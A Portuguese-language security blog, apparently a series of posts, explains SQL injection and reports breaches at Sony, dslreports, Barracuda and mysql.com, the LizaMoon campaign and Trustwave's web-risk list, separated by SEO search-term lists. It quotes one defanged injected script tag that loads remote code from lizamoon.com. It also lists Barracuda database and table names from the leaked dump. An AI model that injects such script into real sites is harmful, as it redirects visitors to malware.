Hora Zero

Como todos os tópicos recentes são sobre sql injection, vou aproveitar e explicar um pouco o que é. Para ilustrar o que vou falar vou usar a nova vulnerabilidade que apareceu no Vbulletin e tem até videos no youtube explicando direitinho o passo a passo.

A Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entrada de dados de uma aplicação.

Para se defender de ataques desse tipo tem várias etapas, como verificação no código fonte da aplicação, ajustes nos bancos de dados, e fazer um teste de intrusão, para poder validar essas mudanças, esse teste dependendo da empresa pode ser feito semestralmente.

outro exemplo.

Uma coisa que temos que ter na cabeça é que testes de vulnerabilidades apenas nos dizem as possíveis falhas ou riscos,  portanto não são conclusivos, já um teste de intrusão feito por uma empresa boa, reforço boa, é conclusivo.

Com isso conseguimos traçar uma estratégio de onde investir primeiro. Algumas vezes é difícil justificar o ROI (Return of Investment) de um teste de invasão para a diretoria, então é preciso mostrar os prejuízos que um ataque pode trazer a empresa (tipo a queda do site principal de um e-commerce).

Incoming search terms:

• tunicis com br
• www tunicis con br
• www tunicis com br
• lista de sites vulneraveis a sql injection
• sites vulneraveis a sql injection
• tunicis com
• tunicis con
• vulnerabilidade sql em sites
• Testes de intrusão
• teste vulnerabilidade sql

Depois de alguns dias sem postar, pois estou trabalhando demais, e quando chego em casa mal da vontade de ligar o micro, é a vez da página da sony music brasil cair. Esse começo de ano para a Sony é para esquecer.

A página foi hackeada no dia 4 de junho e AINDA o site se encontra fora do ar.

http://www.sonymusic .com.br/index.asp

Como fiquei alguns dias sem postar teve ainda o ataque que o grupo LulzSec com a Sony Pictures, e conforme os rumores o ataque roubou 4,5 milhões de registros, sendo que pelo menos 1 milhão tenham informações de usuários.

Os hackers utilizaram uma vulnerabilidade de SQL inject, falha bem simples que mostra a fragilidade da empresa diante da ira de hackers de todo o mundo.

O mesmo grupo, chamado de LulzSec, já havia hackeado o site japonês da Sony e Fox.com, onde roubaram e publicaram 363 senhas de funcionários.

Os dados roubados incluem:

• Um link para a pagina vulnerável sonypictures.com.
• 12,500 usuários relacionados ao Auto Trader incluindo datas de aniversário, endereços, endereço de e-mail, nome completo e senhas, IDs e números de telefone.
• 21,000 IDs associados a uma tabela do banco de dados chamada  "BEAUTY_USERS", incluindo endereços de email e senhas em texto puro.
• aproximadamenteo 20,000 Sony Music coupons.
• 18.000 e-mails e senhas de usuários que se registraram para um sorteio do Seinfeld "Del Boca" .
• mais de 65.000 Sony Music codes.

Incoming search terms:

• sony music contato
• sony music brasil contato
• contato sony music
• agora music BRASIL
• contato da sony music
• contato sony music brasil
• telefone da sony music brasil
• email sony music brasil
• telefone da soni music
• tyelefone contato sony music

O sql injection fez mais uma vítima na quarta-feira, o site dslreports.com. Isso mesmo, é aquele aquele site onde todo mundo faz teste de velocidade na internet, o chamado speedtest.

Na quarta-feira havia lentidão no site e começou a dar falhas de conexão, nas verificações viram que 8% do seu banco de dados já tinha sido copiado.

De acordo com um comunicado, o ataque foi parecido ao que recentemente aconteceu ao mysql.com, comentei no meu blog nesse tópico. Eles foram atacados pela vulnerabilidade Blind SQL Injection 

Justin Beech, o fundador e dono do site, disse que os e-mails e senhas em texto capturados pelo ataque cobrem mais de 10 anos de história de seus membros, algumas contas são bem antigas, outras bem novas, outras inativas ou deletadas.

Ele disse que identificou as contas mais novas, aquelas de no máximo 12 meses, e já alertou os donos dessas contas, que somam mais ou menos 9000 contas. As contas antigas e inativas também estão sendo notificadas.

Nos mais de 10 anos de existência do site há mais de 1,6 milhões de contas registradas, fazendo uma conta simples, 8% vazado significa a 135mil contas. Se você tem o hábito de usar a mesma senha para vários sites, você deve mudar as senhas imediatamente, dando prioridade para a senha da sua conta de e-mail.

O dono ainda pediu desculpas pela falha no SQL e de ter colocado as senhas em texto puro. Se bem que agora não adianta mais pedir desculpas, o prejuízo financeiro e de imagem já ocorreu.

Como já mencionado, usar a mesma senha em diversos sites é um risco gigantesco, mas acontece toda hora, e incidentes como esse confirmam que a prática deve ser evitada. Veja nesse site algumas senhas mais usadas e que são facilmente quebradas pelos hackers.

Pela idade do site e o método de gravarem as senhas, podemos imaginar que deva ser um sistema legado, uma das piores coisas nas organizações. Atualizar as vezes um grande parque de máquinas e sistemas demanda um investimento muito alto, muitas empresas não tem como custear isso, mas no caso da dslreports eles não tem muita escolha agora.

Incoming search terms:

• criar tunicis
• jogo de riar tunicis

A moda do Sql injection ainda não entrou na cabeça de quem cria páginas web, é incrível depois de tantos relatos vermos que empresas grandes ainda estão sofrendo com o SQL injection, agora a bola da vez foi a Barracuda.

A Barracuda Networks é uma empresa de capital fechado com sede em Campbell, Califórnia. A Barracuda conta com 8 escritórios internacionais e distribuidores em mais de 35 países. Ela vende sistemas de Antispam, filtro de conteúdo web, aceleradores wan entre outros produtos.

Lista dos bancos de dados comprometidos.

new_barracuda 

information_schema 

Marketing

barracuda 

black_ips 

buniversity 

bware 

co-op 

collections 

cuda_car 

cuda_stats 

dev_new_barracuda 

igivetest 

igivetest_bk1_aug10

igivetestsucks 

kb_solutions 

leads 

mysql 

new_barracuda

new_barracuda_archive

php_live_chat

phpmyadmin

DB NAME: NEW_BARRACUDA

TABLE NAME: DEAL_REG

DATA COUNT: Count(*) of new_barracuda.deal_reg is 17549

SAMPLE DATA:

 DB NAME: NEW_BARRACUDA

TABLE NAME: CMS_LOGINS

DATA COUNT: Count(*) of new_barracuda.cms_logins is 251

DATA:

DB NAME: NEW_BARRACUDA

TABLE NAME: BUNIVERSITY_USERS

DATA COUNT: Count(*) of new_barracuda.buniversity_users is 35

DATA:

DB NAME: MYSQL

TABLE NAME: USER

DATA COUNT: Count(*) of mysql.user is 23

DATA:

DB NAME: PHP_LIVE_CHAT

TABLE NAME:  CHAT_ADMIN

DATA COUNT: Count(*) of php_live_chat.chat_admin is 30

DATA:

Agora a curiosidade fica que no final de 2010 eles criaramum programa de recompensas por detecção de vulnerabilidades, uma série de produtos: Spam & Virus Firewall, Web Filter, Web Application Firewall e NG Firewall, só esqueceram do próprio site deles.

Conforme o blog deles eles confirmaram o ataque e explicam que a falha ocorreu pois o Web Application estava configurado somente como monitoração depois de uma manutenção que eles fizeram na sexta-feira,

Incoming search terms:

• filtro de conteúdo web barracuda
• modadosql

Websense Security Labs e Websense Threatseeker Network identificou hoje uma nova campanha de código malicioso se espalhando pela internet que se chama LizaMoon.

O ataque em massa esta ocorrendo através de SQL injection e adiciona o seguinte código na página do site:

<script src=hxxp://lizamoon.com/ur.php></script>

De acordo com o Google Search, mais de 30 mil URLs estão comprimissadas. Isto inclui inclusive algumas URLs do iTunes, como você pode ver abaixo:

E aqui esta o código injetado em uma das URLs do iTunes:

O jeito que o iTunes trabalha é fazendo download de feeds RSS/XML do publicador e atualizar os podcasts e lista de episódios disponíveis. A websense acredita que esses feeds RSS/XML foram comprometidos com o código malicioso. A boa notícia é que o iTunes codifica as tags do script, então o script não roda no computador do usuário. Excelente trabalho, Apple,  parabéns.

 A URL que é injetada esta indisponível no momento, mas o servidor esta funcionando e rodando, significando que pode haver alguma mudança em breve. Enquanto estava funcionando o script no site somente redirecionava o usuário para um conhecido Antivirus falso: hxxp://defender-uqko.in. Este site também esta indisponível agora., então até o momento não há binarios para analisar.

 O domínio lizamoon.com foi registrado 3 dias atrás com indicios claros de informações falsas.

Incoming search terms:

• lizamoon
• quais os sites mais infectados por virus
• quais os sites mais infectados do mundo
• sites mais infectados
• sites mais infectados do mundo

Acreditem ou não o site do mysql.com foi hackeado através da técnica de sql injection.

Os hackers colocaram na internet uma lista com os nomes de usuários e respectivas senhas em uma lista de discussões na internet.

Na lista vemos algumas coisas bem preocupantes como a senha do Diretor do gerenciamento do wordpress, uma senha de 4 números….será a senha do seu banco? Algumas contas com senhas como "qa". A ironia é que foram hackeados não por senhas fracas mas sim por um erro na implementação do site.

A Sun/Oracke também foi hackeada e alguns emails e tabelas também foram postados na internet.

Parece não ser uma falha no MySql mas sim na construção do site. Efetuar testes de intrusão em sites tem que ser uma prática comum, somente assim podemos descobrir falhas onde não temos conhecimento, como aplicativos antigos ou sistemas operacionais sem atualização.

Foi postado no Twitter que o site mysql.com também esta sujeito a um ataque de XSS (Cross-site scripting) que foi reportado em janeiro desse ano e ainda não foi corrigido.

O relatório coleta os dados da SpiderLabs durante 220 investigações forense e mais de 2,300 testes de intrusão manual. Reparou que a palavra manual esta em itálico? Isso significa que o uso não foi através de scanners automáticos mas em testes manuais de redes e aplicações, ou seja, ele vai mais a fundo no alvo e descobre algumas vulnerabilidades que o software automático não o faz.. O relatório é bem completo e merece uma visita no site da Trustwave.

Um exemplo que podemos pegar é o de ataques a aplicações web e os maiores riscos que elas tem. A lista é baseada em frequencia, dado coletado, dificuldade de lançar o ataque e potencial impacto quando explorado pelos criminosos.

Por exemplo, enquanto SQL injection não é a vulnerabilidade mais comum que encontramos, o potencial de impacto a organização quem tem esses dados roubados fez ela ser  o risco número um 2010. Já Cross-Site é mais comum achar mais mais difícil de ser executado.

Top 10 dos Riscos de Aplicações Web

SQL Injection
Logic Flaw
Authorization Bypass
Cross-site Scripting (XSS)
Authentication Bypass
Vulnerable Third Party Software
Session Handling Flaw
Cross-site Request Forgery (CSRF)
Verbose Errors
Source Code Disclosure

Incoming search terms:

• o que é ataque authorization bypass
• relatorio seguranca trustwave
• riscos aplicações web